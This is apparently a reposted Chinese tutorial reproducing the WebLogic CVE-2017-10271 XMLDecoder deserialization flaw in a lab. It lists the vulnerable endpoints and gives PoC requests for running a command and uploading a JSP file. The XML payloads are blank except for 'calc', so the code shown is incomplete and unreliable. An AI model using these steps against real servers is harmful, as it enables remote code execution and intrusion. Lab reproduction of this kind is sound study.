本文共 1865 字，大约阅读时间需要 6 分钟。

一、漏洞描述：

CVE-2017-10271漏洞产生的原因是Weblogic的WLS Security组件对外提供webservice服务，其中使用了XMLDecoder来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。

影响版本：10.3.6.0，12.1.3.0.0，12.2.1.1.0

二、环境搭建

windows service 2008 R2

三、漏洞复现

漏洞检测:

工具利用 — XML反序列化漏洞检查工具

脚本利用 — CVE-2017-10271-poc.py Burp抓包传入数据验证

漏洞地址:

/wls-wsat/CoordinatorPortType /wls-wsat/RegistrationPortTypeRPC /wls-wsat/ParticipantPortType /wls-wsat/RegistrationRequesterPortType /wls-wsat/CoordinatorPortType11 /wls-wsat/RegistrationPortTypeRPC11 /wls-wsat/ParticipantPortType11 /wls-wsat/RegistrationRequesterPortType11

1、在目标环境机调用计算器

访问：http://yourip:7001/wls-wsat/RegistrationRequesterPortType

上面漏洞地址效果都一样的 构造POST数据包, 将Content-Type修改为：text/xml 发送数据包,服务器返回的状态码为500。

利用的poc：

       
           
                
                     
                           
         
          
          
           calc
           
          
          
           
          
          
           
           
          
                        
        
                  
             
        
        
        
   

查看靶机（service 2008）,可以看到目标机器的计算器已经被调用

2、上传文件的poc

POST //wls-wsat/CoordinatorPortType HTTP/1.1Host: yourip:7001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: ADMINCONSOLESESSION=WvRQdwVJLvRTRvNn1f7lDlHGh9hTgyvFQPGy9YqTQpLymTTL9jnZ!-1021969175Upgrade-Insecure-Requests: 1Cache-Control: max-age=0Content-Type: text/xmlContent-Length: 648 
       
        
         
      
           
        
       
          
         
        
    
   

构造post数据包,将Content-Type修改为：text/xml

发送数据包,服务器返回的状态码为500 访问 ：http://your-ip:7001/bea_wls_internal/666.jsp

靶机查看上传的文件地址：servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war

转载地址：http://vwmlf.baihongyu.com/